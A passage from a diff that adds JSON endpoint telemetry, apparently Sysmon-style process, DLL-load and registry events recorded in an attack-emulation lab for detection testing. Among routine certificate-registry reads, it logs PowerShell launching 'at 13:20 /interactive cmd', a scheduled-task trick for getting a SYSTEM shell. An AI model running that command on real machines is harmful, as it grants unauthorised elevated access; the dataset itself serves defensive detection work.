"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", + "registry_value": "0000", + "timestamp": 131883573794330000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", + "registry_value": "0001", + "timestamp": 131883573794330000, + "unique_pid": 
"{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7672, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573803250000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "event_type": "image_load", + "image_name": 
"msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7672, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573803230000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" + }, + { + "command_line": "at 13:20 /interactive cmd", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5964, + "ppid": 7672, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "subtype": "create", + "timestamp": 131883573803349984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}", + "unique_ppid": "{42FC7E13-CC04-5C05-0000-001082DF5601}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, 
+ { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "at.exe", + "image_path": "C:\\Windows\\System32\\at.exe", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803390000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
+ "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573803700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573803700016, + "unique_pid": 
